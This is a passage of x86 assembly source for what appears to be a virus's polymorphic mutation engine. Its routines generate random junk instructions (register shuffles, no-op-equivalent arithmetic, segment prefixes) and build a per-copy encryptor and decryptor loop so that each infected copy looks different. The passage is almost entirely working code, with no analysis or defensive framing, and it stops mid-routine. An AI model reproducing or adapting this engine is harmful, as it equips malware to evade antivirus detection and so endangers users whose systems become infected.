		Jz	GenPolyM_O$
		Or	Al,2h
GenPolyM_O$:	StosB
		Mov	Al,pSemReg
		Shl	Al,3h
		Or	Al,pSemReg
		Or	Al,0C0h
		StosB
		Jmp	GenPolyM_OD$
GenPolyM_OC$:	Mov	Al,83h			; (Cmp)
		StosB
		Mov	Al,pSemReg
		Or	Al,38h
		Or	Al,0C0h
		StosB
		Xor	Al,Al
		StosB
GenPolyM_OD$:	Mov	ECx,5h
		Mov	EBx,Offset GenNoFlagCom
		Call	Enumer
		Mov	Ax,840Fh		; Jz LockSem
		StosW
		Mov	EAx,pXchg
		Sub	EAx,4h
		Sub	EAx,EDi
		StosD
		Mov	Al,pBaseReg
		Mov	Ah,pSemReg
		Mov	EBx,Offset GenAnyCom
		Call	Enumer
		Mov	Al,83h			; Cmp SemReg,2h
		StosB
		Mov	Al,pSemReg
		Or	Al,0F8h
		StosB
		Mov	Al,2h
		StosB
		Mov	EBx,Offset GenNoFlagCom
		Call	Enumer
		Mov	Ax,840Fh		; Jz Done
		StosW
		Mov	pMov,EDi
		StosD
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Mov	EBx,Offset GenAnyCom
		Call	Enumer
		Mov	Al,81h			; Add BaseReg,CodeStart
		StosB
		Mov	Al,pBaseReg
		Or	Al,0C0h
		StosB
		Mov	pBaseAdd,EDi
		StosD
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Call	ENumer
		Mov	Al,1h			; Add [BaseReg][Brdr],BaseReg
		StosB
		Mov	Al,pBaseReg
		Shl	Al,3h
		Or	Al,80h
		Or	Al,pBaseReg
		StosB
		Mov	pAdd,EDi
		StosD
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Call	Enumer
		Mov	Byte Ptr pEnableEncr,1h
		Mov	Al,pBaseReg		; Encryptor, Pop BaseReg
		Or	Al,58h
		Call	StoreByte
		Mov	Al,87h			; Encryptor,
		Call	StoreByte		; Xchg BaseReg,[ESp]
		Mov	Al,pBaseReg
		Shl	Al,3h
		Or	Al,4h
		Call	StoreByte
		Mov	Al,24h
		Call	StoreByte
		Mov	Al,68h			; Encryptor, Push EncrSize
		Call	StoreByte
		Mov	EAx,[ESp]
		Sub	EAx,4h
		Call	StoreDWord
		Mov	EDx,1h			; .LoadRegisters
		Mov	Cl,pBaseReg
		Shl	EDx,Cl
		Or	EDx,10h
		Mov	Al,pBaseReg
		Mov	Ah,-1h
GenPolyM_L$:	Push	EAx
		Call	GenMovCom
		Mov	EAx,2h
		Call	Random
		Or	Al,Al
		Pop	EAx
		Jz	GenPolyM_L1$
		Push	EAx
		Call	GenNoRegCom
		Pop	EAx
GenPolyM_L1$:	Cmp	EDx,0FFh
		Jne	GenPolyM_L$
		Mov	ECx,5h
		Mov	EBx,Offset GenNoRegCom
		Call	Enumer
		Mov	Al,1h			; Encryptor, Border SetUp
		Call	StoreByte		; Add [ESp],BaseReg
		Mov	Al,pBaseReg
		Shl	Al,3h
		Or	Al,4h
		Call	StoreByte
		Mov	Al,24h
		Call	StoreByte
		Mov	pAgain,EDi
		Mov	pAgain_E,ESi
		Mov	EAx,40h			; 10h..50h commands
		Call	Random
		Add	EAx,10h
		Mov	ECx,EAx
GenPolyM_G0$:	Mov	EAx,3h			; .Decrypt
		Call	Random
		Or	Al,Al
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Jnz	GenPolyM_G1$
		Call	GenArCom
		Jmp	GenPolyM_G2$
GenPolyM_G1$:	Call	GenArMemCom
GenPolyM_G2$:	Dec	ECx
		Jnz	GenPolyM_G0$
		Mov	EAx,2h			; Add BaseReg,4h
		Call	Random
		Or	Al,Al
		Jz	GenPolyM_I2$
		Mov	Al,pBaseReg		; (Inc)
		Or	Al,40h
		Mov	ECx,4h
GenPolyM_I1$:	StosB
		Call	StoreByte
		Push	EAx
		Call	GenNoRegCom
		Pop	EAx
		Dec	ECx
		Jnz	GenPolyM_I1$
		Jmp	GenPolyM_I3$
GenPolyM_I2$:	Mov	Al,83h			; (Add)
		StosB
		Call	StoreByte
		Mov	Al,pBaseReg
		Or	Al,0C0h
		StosB
		Call	StoreByte
		Mov	Al,4h
		StosB
		Call	StoreByte
GenpolyM_I3$:	Mov	ECx,5h
		Mov	EBx,Offset GenArCom
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Call	Enumer
		Mov	Al,81h			; Cmp BaseReg,Limit
		StosB
		Mov	Al,pBaseReg
		Or	Al,0F8h
		StosB
		Mov	EAx,EDi
		Sub	EAx,pBase
		Mov	EBx,pAdd
		Mov	[EBx],EAx		; 1pass Complete Add command
		Mov	EAx,[ESp]
		Sub	EAx,4h
		StosD
		Mov	Al,3Bh			; Encryptor, Border check
		Call	StoreByte		; Cmp BaseReg,[ESp]
		Mov	Al,pBaseReg
		Shl	Al,3h
		Or	Al,4h
		Call	StoreByte
		Mov	Al,24h
		Call	StoreByte
		Mov	EBx,Offset GenNoFlagCom
		Call	Enumer
		Mov	Ax,820Fh
		StosW
		Call	StoreWord
		Mov	EAx,pAgain		; Complete Jmp Again commands
		Sub	EAx,EDi
		Sub	EAx,4h
		StosD
		Mov	EAx,pAgain_E
		Sub	EAx,ESi
		Sub	EAx,4h
		Call	StoreDWord
		Mov	Al,58h			; Complete encryptor
		Call	StoreByte
		Mov	Al,0C3h
		Call	StoreByte
		Mov	Byte Ptr pEnableEncr,0h
		Mov	EBx,Offset GenAnyCom
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Call	Enumer
		Mov	Al,81h			; Sub BaseReg,CodeSize
		StosB
		Mov	Al,pBaseReg
		Or	Al,0E8h
		StosB
		Mov	pBaseSub,EDi
		StosD
		Mov	Al,pBaseReg
		Mov	Ah,-1h
		Call	Enumer
		Mov	Al,0C7h			; Mov [BaseReg][Sem],2h
		StosB
		Mov	Al,pBaseReg
		Or	Al,80h
		StosB
		Mov	EAx,pSem
		StosD
		Mov	EAx,2h
		StosD
		Mov	EAx,EDi			; Complete Jmp Done command
		Sub	EAx,pMov
		Sub	EAx,4h
		Mov	EBx,pMov
		Mov	[EBx],EAx
		Mov	EBx,Offset GenAnyCom
		Mov	Ax,-1h
		Call	Enumer
		Mov	Al,61h			; PopA
		StosB
		Mov	EBx,Offset GenNoRegCom
		Call	Enumer
		Mov	EAx,EDi			; Complete Base To Body SetUp
		Sub	EAx,pBase
		Mov	EBx,pBaseAdd
		Mov	[EBx],EAx
		Mov	EBx,pAdd		; 2pass Complete Add command
		Sub	[EBx],EAx
		Mov	EBx,[ESp]		; Backward Body to Base SetUp
		Dec	EBx
		And	Bl,0FCh			; Rounded by 4h
		Add	EAx,EBx
		Mov	EBx,pBaseSub
		Mov	[EBx],EAx
		Pop	ECx
		Mov	EDx,EDi			; All done successfully!
		Sub	EDx,[ESp]		; EDx - decryptor size
		Mov	EBx,ESi
		Sub	EBx,[ESp][4]		; EBx - encryptor size
		Add	ESp,8h
		Ret

; ---------------------------------------------------------
GenArMemCom:	Push	EAx			; Some command that
		Mov	EAx,2h			; change memory by
		Call	Random			; base in EAx (Al)
		Or	Al,Al
		Jz	GenArMem_Imm$
		Mov	Al,2h			; Add; Sub (Reg)
		Call	Random
		Or	Al,Al
		Jz	GenArMem_R_1$
		Mov	Al,28h
GenArMem_R_1$:	Or	Al,1h
		StosB
		Xor	Al,28h
		Call	StoreByte
		Pop	EAx
		Push	EBx
		Mov	EBx,EAx
GenArMem_R_2$:	Call	GetNoESpReg
		Cmp	Al,Bl
		Je	GenArMem_R_2$
		Cmp	Al,Bh
		Je	GenArMem_R_2$
		Shl	Al,3h
		Or	Al,Bl
		Pop	EBx
		Mov	Ah,Al
		Call	GenArMem_Comp$
		Ret

GenArMem_Imm$:	Mov	Al,2h			; Add; Sub (Imm)
		Call	Random
		Add	Al,Al
		Or	Al,81h
		StosB
		Call	StoreByte
		Xchg	EAx,[ESp]
		Push	EAx
		Mov	Al,2h
		Call	Random
		Or	Al,Al
		Pop	EAx
		Jz	GenArmem_I_1$
		Or	Al,28h
GenArMem_I_1$:	Mov	Ah,Al
		Xor	Ah,28h
		Call	GenArMem_Comp$
		Pop	EAx
		Cmp	Al,83h
		Jne	GenArMem_I_2$
		Mov	Ax,100h			; Byte operand
		Call	Random
		StosB
		Call	StoreByte
		Ret
GenArMem_I_2$:	Mov	EAx,RandSeed		; DWord operand
		StosD
		Call	StoreDWord
		Ret

GenArMem_Comp$:	Push	EAx			; Compile addressing
		And	Al,7h			; modes (Corrupt EAx)
		Cmp	Al,4h
		Je	GenArMem_C_1$
		Cmp	Al,5h
		Je	GenArMem_C_2$
		Pop	EAx
		StosB
GenArMem_C0$:	Mov	Al,Ah
		Push	EAx
		And	Al,7h
		Cmp	Al,4h
		Je	GenArMem_C_3$
		Cmp	Al,5h
		Je	GenArMem_C_4$
		Pop	EAx
		Call	StoreByte
		Ret

GenArMem_C_1$:	Pop	EAx			; [ESp]
		StosB
		Mov	Al,24h
		StosB
		Jmp	GenArMem_C0$

GenArMem_C_2$:	Pop	EAx			; [EBp]
		Or	Al,40h
		And	Al,0FEh
		StosB
		Mov	Al,25h
		StosB
		Mov	Al,0h
		StosB
		Jmp	GenArMem_C0$

GenArMem_C_3$:	Pop	EAx			; [ESp]
		Call	StoreByte
		Mov	Al,24h
		Call	StoreByte
		Ret

GenArMem_C_4$:	Pop	EAx			; [EBp]
		Or	Al,40h
		And	Al,0FEh
		Call	StoreByte
		Mov	Al,25h
		Call	StoreByte
		Mov	Al,0h
		Call	StoreByte
		Ret


; ---------------------------------------------------------
GenAnyCom:	Push	EAx
		Push	EBx			; Some command that
		Push	EDx			; changes registers
		Mov	EBx,EAx			; but don't change some
GenAnyCom_0_1$:	Call	GetNoESpReg		; registers by # in Ax (Ah,Al)
		Cmp	Al,Bl			; (Corrupt EAx)
		Je	GenAnyCom_0_1$
		Cmp	Al,Bh
		Je	GenAnyCom_0_1$
		Mov	Dl,Al
GenAnyCom_0_2$:	Call	GetNoESpReg
		Cmp	Al,Bl
		Je	GenAnyCom_0_2$
		Cmp	Al,Bh
		Je	GenAnyCom_0_2$
		Mov	Ah,Dl
		Pop	EDx
		Pop	EBx
		Push	EAx
		Mov	EAx,0Ch
		Call	Random
		Or	EAx,EAx
		Jnz	GenAnyCom_1$		; ">0"
		Pop	EAx			; Ar command
		Pop	EAx
		Jmp	GenArCom

GenAnyCom_1$:	Dec	EAx
		Jnz	GenAnyCom_2$		; ">1"
		Pop	EAx			; Mov/Lea command
		Pop	EAx
		Push	EDx
		Call	GenMovCom
		Pop	EDx
		Ret

GenAnyCom_2$:	Dec	EAx
		Jnz	GenAnyCom_3$		; ">2"
		Pop	EAx			; Cbw; Cwde
		Pop	EAx
		Or	Al,Al
		Jz	GenAnyCom
		Or	Ah,Ah
		Jz	GenAnyCom
		Mov	EAx,2h
		Call	Random
		Or	Al,Al
		Jz	GenAnyCom_2_1$
		Mov	Al,66h
		StosB
GenAnyCom_2_1$:	Mov	Al,98h
		StosB
		Ret

GenAnyCom_3$:	Dec	EAx
		Jnz	GenAnyCom_4$		; ">3"
		Pop	EAx			; Cwd; Cdq
		Pop	EAx
		Or	Al,Al
		Jz	GenAnyCom
		Or	Ah,Ah
		Jz	GenAnyCom
		Cmp	Al,2h
		Je	GenAnyCom
		Cmp	Ah,2h
		Je	GenAnyCom
		Mov	EAx,2h
		Call	Random
		Or	Al,Al
		Jz	GenAnyCom_3_1$
		Mov	Al,66h
		StosB
GenAnyCom_3_1$:	Mov	Al,99h
		StosB
		Ret

GenAnyCom_4$:	Dec	EAx
		Jnz	GenAnyCom_5$		; ">4"
		Pop	EAx			; Aas; Aaa; Daa; Das
		Pop	EAx
		Or	Al,Al
		Jz	GenAnyCom
		Or	Ah,Ah
		Jz	GenAnyCom
		Mov	EAx,4h
		Call	Random
		Shl	Al,3h
		Or	Al,27h
		StosB
		Ret

GenAnyCom_5$:	Dec	EAx
		Jnz	GenAnyCom_6$		; ">5"
		Pop	EAx			; Aad; Aam
		Pop	EAx			; operand must be <>0
		Or	Al,Al
		Jz	GenAnyCom
		Or	Ah,Ah
		Jz	GenAnyCom
		Mov	EAx,2h
		Call	Random
		Or	Al,0D4h
		StosB
		Mov	Al,0FFh
		Call	Random
		Inc	Al
		StosB
		Ret

GenAnyCom_6$:	Dec	EAx
		Jnz	GenAnyCom_7$		; ">6"
		Pop	EAx			; Loop $+2
		Pop	EAx
		Cmp	Al,1h
		Je	GenAnyCom
		Cmp	Ah,1h
		Je	GenAnyCom
		Mov	Ax,0E2h
		StosW
		Ret

GenAnyCom_7$:	Dec	EAx
		Jnz	GenAnyCom_8$		; ">7"
		Mov	Al,0D1h			; Rol; Shl;
		StosB				; Ror; Shr; Sar;
		Pop	EAx			; Rcl; Rcr
		Push	EBx
		Mov	EBx,EAx
GenAnyCom_7_0$:	Mov	EAx,8h
		Call	Random
		Cmp	Al,6h
		Je	GenAnyCom_7_0$
		Shl	Al,3h
		Or	Al,Bl
		Or	Al,0C0h
		StosB
		Pop	EBx
		Pop	EAx
		Ret

GenAnyCom_8$:	Dec	EAx
		Jnz	GenAnyCom_9$		; ">8"
		Mov	Al,89h			; Mov Reg1,Reg2
		StosB
		Pop	EAx
		Shl	Al,3h
		Or	Al,Ah
		Or	Al,0C0h
		StosB
		Pop	EAx
		Ret

GenAnyCom_9$:	Dec	EAx
		Jnz	GenAnyCom_10$		; ">9"
		Mov	Al,4h			; Adc; Sbb; Or; And
		Call	Random
		Inc	Al
		Shl	Al,3h
		Or	Al,1h
		Push	EBx
		Mov	EBx,EAx
		Mov	Al,2h
		Call	Random
		Shl	Al,1h
		Or	Al,Bl
		Pop	EBx
		StosB
		Pop	EAx
		Shl	Al,3h
		Or	Al,Ah
		Or	Al,0C0h
		StosB
		Pop	EAx
		Ret

GenAnyCom_10$:	Dec	EAx
		Jnz	GenAnyCom_11$		; ">10"
		Mov	Al,2h			; Adc; Sbb; Or; And [Imm]
		Call	Random
		Or	Al,Al
		Pop	EAx
		PushF
		Push	EAx
		Jz	GenAnyCom_10a$
		Mov	Al,66h
		StosB
GenAnyCom_10a$:	Mov	EAx,2h
		Call	Random
		Shl	Al,1h
		Or	Al,81h
		StosB
		Xchg	EAx,[ESp]
		Push	EBx
		Mov	EBx,EAx
		Mov	EAx,4h
		Call	Random
		Inc	EAx
		Shl	Al,3h
		Or	Al,0C0h
		Or	Al,Bl
		Pop	EBx
		StosB
		Pop	EAx
		Cmp	Al,83h
		Je	GenAnyCom_10b$
		Mov	Ax,Word Ptr RandSeed	; Imm16
		StosW
		PopF
		Jnz	GenAnyCom_10c$
		Mov	Ax,Word Ptr RandSeed+2	; Imm32
		StosW
GenAnyCom_10c$:	Pop	EAx
		Ret

GenAnyCom_10b$:	Mov	EAx,100h		; Imm8
		Call	Random
		StosB
		PopF
		Pop	EAx
		Ret

GenAnyCom_11$:	Pop	EAx
		Or	Al,50h			; Push Reg1 / Pop Reg2
		StosB
		Push	EAx			; Seria of commands
		Mov	EAx,5h
		Call	Random
		Push	ECx
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenAnyCm_11_1$
GenAnyCm_11_1$:	Mov	EAx,[ESp][2*4]
		Call	GenAnyCom
		Dec	ECx
		Jnz	GenAnyCm_11_2$
GenAnyCm_11_2$:	Pop	ECx
		Pop	EAx
		Mov	Al,Ah
		Or	Al,58h
		StosB
		Pop	EAx
		Ret

; ---------------------------------------------------------
GenArCom:	Push	EAx
		Push	EBx			; Some command that pretty
		Push	EDx			; changes registers
		Mov	EBx,EAx			; but don't change some
GenArCom_0_1$:	Call	GetNoESpReg		; registers by # in Ax (Ah,Al)
		Cmp	Al,Bl			; (Corrupt EAx)
		Je	GenArCom_0_1$
		Cmp	Al,Bh
		Je	GenArCom_0_1$
		Mov	Dl,Al
GenArCom_0_2$:	Call	GetNoESpReg
		Cmp	Al,Bl
		Je	GenArCom_0_2$
		Cmp	Al,Bh
		Je	GenArCom_0_2$
		Shl	Al,3h
		Or	Al,Dl
		Or	Al,0C0h
		Pop	EDx
		Pop	EBx
		Push	EAx
		Mov	EAx,7h
		Call	Random
		Or	EAx,EAx
		Jnz	GenArCom_1$		; ">0"
		Pop	EAx			; NoReg command
		Pop	EAx
		Jmp	GenNoRegCom

GenArCom_1$:	Dec	EAx
		Jnz	GenArCom_2$		; ">1"
		Mov	Al,87h			; Xchg Reg1,Reg2
		StosB
		Call	StoreByte
		Pop	EAx
		StosB
		Call	StoreByte
		Pop	EAx
		Ret

GenArCom_2$:	Dec	EAx
		Jnz	GenArCom_3$		; ">2"
		Pop	EAx			; Push Reg1; Push Reg2
		Mov	Ah,Al			; Pop Reg2; Pop Reg1
		And	Al,7h
		Or	Al,50h
		StosB
		Call	StoreByte
		Mov	Al,Ah
		Shr	Al,3h
		And	Al,7h
		Or	Al,50h
		StosB
		Call	StoreByte
		Push	ECx			; Seria of commands
		Push	EAx
		Mov	EAx,5h
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenArCom_2_1$
GenArCom_2_2$:	Mov	EAx,[ESp][2*4]
		Call	GenArCom
		Dec	ECx
		Jnz	GenArCom_2_2$
GenArCom_2_1$:	Pop	EAx
		Pop	ECx
		Mov	Al,Ah
		And	Al,7h
		Or	Al,58h
		StosB
		Call	StoreByte
		Mov	Al,Ah
		Shr	Al,3h
		And	Al,7h
		Or	Al,58h
		StosB
		Call	StoreByte
		Pop	EAx
		Ret

GenArCom_3$:	Dec	EAx
		Jnz	GenArCom_4$		; ">3"
		Mov	EAx,2h			; Xor Reg1,Reg2
		Call	Random
		Or	Al,38h
		Or	Al,1h
		StosB
		Call	StoreByte
		Pop	EAx
		StosB
		Call	StoreByte
		Pop	EAx
		Ret

GenArCom_4$:	Dec	EAx
		Jnz	GenArCom_5$		; ">4"
		Mov	Al,2h			; Add Reg1,Reg2
		Call	Random			; Sub Reg1,Reg2
		Or	Al,Al
		Jz	GenArCom_4_1$
		Mov	Al,28h
GenArCom_4_1$:	Or	Al,1h
		Push	EBx
		Mov	EBx,EAx
		Mov	Al,2h
		Call	Random
		Or	Al,Bl
		StosB
		Call	StoreByte
		Pop	EBx
		Pop	EAx
		StosB
		Call	StoreByte
		Pop	EAx
		Ret

GenArCom_5$:	Dec	EAx
		Jnz	GenArCom_6$		; ">5"
		Mov	Al,2h			; Add; Sub; Xor [Imm]
		Call	Random
		Or	Al,Al
		Pop	EAx
		PushF
		Push	EAx
		Jz	GenArCom_5_1$
		Mov	Al,66h
		StosB
		Call	StoreByte
GenArCom_5_1$:	Mov	EAx,2h
		Call	Random
		Shl	Al,1h
		Or	Al,81h
		StosB
		Call	StoreByte
		Xchg	EAx,[ESp]
		Push	EAx
		Mov	EAx,3h
		Call	Random
		Shl	Al,3h
		Push	ECx
		Mov	Cl,Al
		Mov	EAx,002830h
		Shr	EAx,Cl
		Pop	ECx
		Xchg	EBx,[ESp]
		And	Bl,7h
		Or	Al,Bl
		Or	Al,0C0h
		StosB
		Call	StoreByte
		Pop	EBx
		Pop	EAx
		Cmp	Al,83h
		Je	GenArCom_5_2$
		Mov	Ax,Word Ptr RandSeed
		StosW
		Call	StoreWord		; Imm16
		PopF
		Jnz	GenArCom_5_3$
		Mov	Ax,Word Ptr RandSeed+2	; Imm32
		StosW
		Call	StoreWord
GenArCom_5_3$:	Pop	EAx
		Ret

GenArCom_5_2$:	Mov	EAx,100h		; Imm8
		Call	Random
		StosB
		Call	StoreByte
		PopF
		Pop	EAx
		Ret

GenArCom_6$:	Mov	Al,0D1h			; Rol Reg,1
		StosB				; Ror Reg,1
		Call	StoreByte
		Pop	EAx
		Push	EBx
		Mov	EBx,EAx
		Mov	EAx,2h
		Call	Random
		Shl	Al,3h
		And	Bl,0C7h
		Or	Al,Bl
		StosB
		Call	StoreByte
		Pop	EBx
		Pop	EAx
		Ret

; ---------------------------------------------------------
GenMovCom:	Push	EBx			; Some command that loads
		Mov	EBx,EAx			; registers by values
GenMovCom_1$:	Call	GetNoESpReg		; but don't change some
		Cmp	Al,Bl			; register by # in Ax (Ah,Al)
		Je	GenMovCom_1$		; set bit in mask
		Cmp	Al,Bh			; transferred in EDx
		Je	GenMovCom_1$		; (Corrupt EAx)
		Mov	EBx,EAx
		Push	ECx
		Mov	Cl,Al
		Mov	EAx,1
		Shl	EAx,Cl
		Or	EDx,EAx			; Set bit in mask
		Pop	ECx
		Mov	EAx,2h
		Call	Random
		Or	Al,Al
		Jz	GenMovCom_Lea$
		Mov	Al,Bl			; Mov style
		Or	Al,0B8h
		StosB
		Call	StoreByte
		Mov	EAx,RandSeed
		StosD
		Call	StoreDWord
		Pop	EBx
		Ret

GenMovCom_Lea$:	Mov	Al,8Dh			; Lea style
		StosB
		Call	StoreByte
		Mov	Al,Bl
		Shl	Al,3h
		Or	Al,5h
		StosB
		Call	StoreByte
		Mov	EAx,RandSeed
		StosD
		Call	StoreDWord
		Pop	EBx
		Ret

; ---------------------------------------------------------
GenNoRegCom:	Xor	EAx,EAx			; Some command that don't
		Mov	Al,0Eh			; change registers
		Call	Random			; (Corrupt EAx)
		Or	EAx,EAx
		Jnz	GenNoReg_1$		; ">0"
		Call	GenNoFlagCom		; NoFlag command
		Ret

GenNoReg_1$:	Dec	EAx
		Jnz	GenNoReg_2$		; ">1"
		Mov	Al,2h			; Clc or Stc
		Call	Random
		Or	Al,0F8h
		StosB
		Ret

GenNoReg_2$:	Dec	EAx
		Jnz	GenNoReg_3$		; ">2"
		Mov	Al,2h			; Cld or Std
		Call	Random
		Or	Al,0FCh
		StosB
		Ret

GenNoReg_3$:	Dec	EAx
		Jnz	GenNoReg_4$		; ">3"
		Mov	Al,0F5h			; Cmc
		StosB
		Ret

GenNoReg_4$:	Dec	EAx
		Jnz	GenNoReg_5$		; ">4"
		Mov	Al,4h			; Or Reg,Reg
		Call	Random
		Or	Al,8h
		StosB
		Call	GetEqRegs
		StosB
		Ret

GenNoReg_5$:	Dec	EAx
		Jnz	GenNoReg_6$		; ">5"
		Mov	Al,4h			; And Reg,Reg
		Call	Random
		Or	Al,20h
		StosB
		Call	GetEqRegs
		StosB
		Ret

GenNoReg_6$:	Dec	EAx
		Jnz	GenNoReg_7$		; ">6"
		Mov	Al,4h			; Cmp Reg1,Reg2
		Call	Random
		Or	Al,38h
		StosB
		Call	GetNoEqRegs
		StosB
		Ret

GenNoReg_7$:	Dec	EAx
		Jnz	GenNoReg_8$		; ">7"
		Mov	Al,2h			; Test Reg1,Reg2
		Call	Random
		Or	Al,84h
		StosB
		Call	GetNoEqRegs
		StosB
		Ret

GenNoReg_8$:	Dec	EAx
		Jnz	GenNoReg_9$		; ">8"
		Mov	Al,2h			; Test Reg,0XXXXh
		Call	Random
		Or	Al,0F6h
		StosB
		Push	EAx
		Call	GetReg
		Or	Al,0C0h
		StosB
		Pop	EAx
		Cmp	Al,0F6h
		Jne	GenNoReg_8_1$
		Mov	EAx,100h
		Call	Random
		StosB
		Ret
GenNoReg_8_1$:	Mov	EAx,RandSeed
		StosD
		Ret

GenNoReg_9$:	Dec	EAx
		Jnz	GenNoReg_10$		; ">9"
		Mov	Al,2h			; Cmp Reg,0XXXXh
		Call	Random
		Or	Al,80h
		StosB
		Push	EAx
		Call	GetReg
		Or	Al,0F8h
		StosB
		Pop	EAx
		Cmp	Al,80h
		Jne	GenNoReg_9_1$
		Mov	EAx,100h
		Call	Random
		StosB
		Ret
GenNoReg_9_1$:	Mov	EAx,RandSeed
		StosD
		Ret

GenNoReg_10$:	Dec	EAx
		Jnz	GenNoReg_11$		; ">10"
		Call	GetNoESpReg		; Inc Reg / Dec Reg
		Or	Al,40h
		Push	EBx
		Mov	Bl,Al
		Mov	Al,2h
		Call	Random
		Shl	Al,3h
		Or	Al,Bl
		Pop	EBx
		StosB
		Push	EAx			; Some seria of commands
		Push	ECx
		Mov	EAx,5h			; How many. . .
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoReg_10_1$
GenNoReg_10_2$:	Call	GenNoRegCom
		Dec	ECx
		Jnz	GenNoReg_10_2$
GenNoReg_10_1$:	Pop	ECx
		Pop	EAx
		Xor	Al,8h
		StosB
		Ret

GenNoReg_11$:	Dec	EAx
		Jnz	GenNoReg_12$		; ">11"
		Mov	Al,2h			; Rol Reg,1 / Ror Reg,1
		Call	Random			; Inc Reg,1 / Dec Reg,1
		Push	EAx
		Mov	Al,2h
		Call	Random
		Or	Al,Al
		Pop	EAx
		Mov	Ah,0D0h
		Je	GenNoReg_11_0$
		Mov	Ah,0FEh
GenNoReg_11_0$:	Or	Al,Ah
		Push	EAx
		StosB
		Call	GetNoESpReg
		Or	Al,0C0h
		Push	EBx
		Mov	Bl,Al
		Mov	Al,2h
		Call	Random
		Shl	Al,3h
		Or	Al,Bl
		Pop	EBx
		StosB
		Push	EAx			; Some seria of commands
		Push	ECx
		Mov	EAx,5h			; How many. . .
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoReg_11_1$
GenNoReg_11_2$:	Call	GenNoRegCom
		Dec	ECx
		Jnz	GenNoReg_11_2$
GenNoReg_11_1$:	Pop	ECx
		Pop	EAx
		Xchg	EAx,[ESp]
		StosB
		Pop	EAx
		Xor	Al,8h
		StosB
		Ret

GenNoReg_12$:	Dec	EAx
		Jnz	GenNoReg_13$		; ">12"
		Mov	Al,2h			; Xchg Reg1,Reg2 (Twice)
		Call	Random			; (without ESp)
		Or	Al,86h
		Push	EBx
		Mov	Bl,Al
		Call	GetNoEqRegs0
		Mov	Ah,Bl
		Pop	EBx
		Xchg	Ah,Al
		StosW
		Push	EAx			; Seria ;-) from One command
		Call	GenNoRegCom
		Pop	EAx
		StosW
		Ret

GenNoReg_13$:	Mov	Al,2h			; Add; Sub; Xor [Imm]
		Call	Random			; Sub; Add; Xor [Imm]
		Or	Al,Al
		PushF				; _Prefix
		Jz	GenNoReg_13_1$
		Mov	Al,66h
		StosB
GenNoReg_13_1$:	Mov	Al,4h
		Call	Random
		Or	Al,80h
		StosB
		Push	EAx			; _ComByte
		Mov	Al,3h
		Call	Random
		Shl	Al,3h
		Push	EAx			; _ComNum
		Push	ECx
		Mov	Cl,Al
		Mov	EAx,002830h
		Shr	EAx,Cl
		Mov	ECx,EAx
		Call	GetNoESpReg
		Or	Cl,Al
		Xchg	EAx,[ESp]		; _RegNum
		Xchg	EAx,ECx
		Or	Al,0C0h
		StosB
		Mov	EAx,RandSeed
		Push	EAx			; _MagicDWord
		Mov	EAx,[ESp][3*4]
		Cmp	Al,81h
		Jne	GenNoReg13_2$
		Mov	EAx,[ESp]
		StosW
		Mov	EAx,[ESp][4*4]
		Push	EAx
		PopF
		Jnz	GenNoReg13_3$
		Mov	EAx,[ESp]
		Shr	EAx,16
		StosW
		Jmp	GenNoReg13_3$

GenNoReg13_2$:	Mov	EAx,[ESp]
		StosB

GenNoReg13_3$:	Push	ECx			; Seria of commands. . .
		Mov	EAx,5h
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoReg13_4$
GenNoReg13_5$:	Call	GenNoRegCom
		Dec	ECx
		Jnz	GenNoReg13_5$
GenNoReg13_4$:	Pop	ECx

		Mov	EAx,[ESp][4*4]		; Mirror command
		Push	EAx
		PopF
		Jz	GenNoReg13_6$
		Mov	Al,66h
		StosB
GenNoReg13_6$:	Mov	EAx,[ESp][3*4]
		StosB
		Push	ECx
		Mov	ECx,[ESp][2*4]+4
		Mov	EAx,280030h
		Shr	EAx,Cl
		Mov	ECx,EAx
		Mov	EAx,[ESp][1*4]+4
		Or	Al,Cl
		Or	Al,0C0h
		StosB
		Pop	ECx
		Mov	EAx,[ESp][3*4]
		Cmp	Al,81h
		Jne	GenNoReg13_7$
		Mov	EAx,[ESp]
		StosW
		Mov	EAx,[ESp][4*4]
		Push	EAx
		PopF
		Jnz	GenNoReg13_8$
		Mov	EAx,[ESp]
		Shr	EAx,16
		StosW
GenNoReg13_8$:	Add	ESp,5*4
		Ret

GenNoReg13_7$:	Mov	EAx,[ESp]
		StosB
		Add	ESp,5*4
		Ret

; ---------------------------------------------------------
GenNoFlagCom:	Xor	EAx,EAx			; Some command that don't
		Mov	Al,0Ah			; change anything
		Call	Random			; (Corrupt EAx)
		Or	EAx,EAx
		Jnz	GenNoFlag_1$		; ">0"
		Mov	Al,90h			; Nop command
		StosB
		Ret

GenNoFlag_1$:	Dec	EAx
		Jnz	GenNoFlag_2$		; ">1"
GenNoFlag_1_1$:	Mov	Al,4h			; Segments DS: ES: SS:
		Call	Random			; Without CS: !
		Shl	Al,3h
		Or	Al,26h
		Cmp	Al,2Eh
		Je	GenNoFlag_1_1$
		StosB
		Ret

GenNoFlag_2$:	Dec	EAx
		Jnz	GenNoFlag_3$		; ">2"
		Mov	Ax,0E3h			; JECxZ $+2
		StosW
		Ret

GenNoFlag_3$:	Dec	EAx
		Jnz	GenNoFlag_4$		; ">3"
		Mov	Al,2h			; Xchg Reg,Reg
		Call	Random
		Or	Al,86h
		StosB
		Call	GetEqRegs
		StosB
		Ret

GenNoFlag_4$:	Dec	EAx
		Jnz	GenNoFlag_5$		; ">4"
		Mov	Al,4h			; Mov Reg,Reg
		Call	Random
		Or	Al,88h
		StosB
		Call	GetEqRegs
		StosB
		Ret

GenNoFlag_5$:	Dec	EAx
		Jnz	GenNoFlag_6$		; ">5"
		Call	GetNoESpReg		; Push Reg / Pop Reg
		Or	Al,50h
		StosB
		Push	EAx			; Some seria of commands
		Push	ECx
		Mov	EAx,5h			; How many. . .
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoFlag_5_1$
GenNoFlag_5_2$:	Call	GenNoFlagCom
		Dec	ECx
		Jnz	GenNoFlag_5_2$
